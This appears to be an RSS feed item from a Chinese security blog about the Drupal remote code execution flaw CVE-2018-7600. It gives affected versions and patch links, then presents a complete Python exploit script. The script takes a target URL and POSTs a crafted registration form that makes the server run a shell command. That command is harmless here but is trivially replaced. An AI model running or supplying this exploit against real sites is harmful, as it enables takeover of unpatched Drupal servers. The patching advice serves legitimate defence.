<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Drupal &#8211; ChaBug安全</title>
	<atom:link href="/tags/drupal/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 17 May 2018 12:52:07 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>CVE-2018-7600 Drupal 远程命令执行漏洞EXP</title>
		<link>/web/399.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 14 Apr 2018 15:19:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[Drupal]]></category>
		<category><![CDATA[exp]]></category>
		<category><![CDATA[收集]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[远程命令执行]]></category>
		<guid isPermaLink="false">/?p=328</guid>

					<description><![CDATA[CVE-2018-7600 Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8...]]></description>
										<content:encoded><![CDATA[<p>CVE-2018-7600</p>
<blockquote><p><span class="wpcom_tag_link"><a href="/tags/drupal" title="Drupal" target="_blank">Drupal</a></span> before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .</p></blockquote>
<h3>影响版本</h3>
<ol>
<li>Drupal 6</li>
<li>Drupal 7</li>
<li>Drupal 8</li>
</ol>
<h3>修复建议</h3>
<p>Drupal 6.x的修复参考以下网站：</p>
<p><a href="https://www.drupal.org/project/d6lts">https://www.drupal.org/project/d6lts</a></p>
<p>Drupal 7.x请升级到Drupal 7.5.8版本，</p>
<p>同时官方给出7.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&#038;id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5">https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&#038;id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5</a></p>
<p>Drupal 8.5.x请升级到Drupal 8.5.1版本</p>
<p>同时官方给出8.5.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f">https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f</a></p>
<p>Drupal 8.3.x和8.4.x版本官方已不进行维护，但此<span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>非常严重，官方此次也给出了对应补丁，补丁同8.5.x版本：补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f">https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f</a></p>
<p>由于Drupal 8.3.x和8.4.x版本官方已不进行维护，建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本</p>
<h3>友情提示</h3>
<p>Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护，请各位用户升级到官方维护的版本</p>
<h3>EXP</h3>
<pre><code>#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo &quot;;-)&quot; | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit(&quot;Not exploitable&quot;)
print ('\nCheck: '+target+'hello.txt')</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
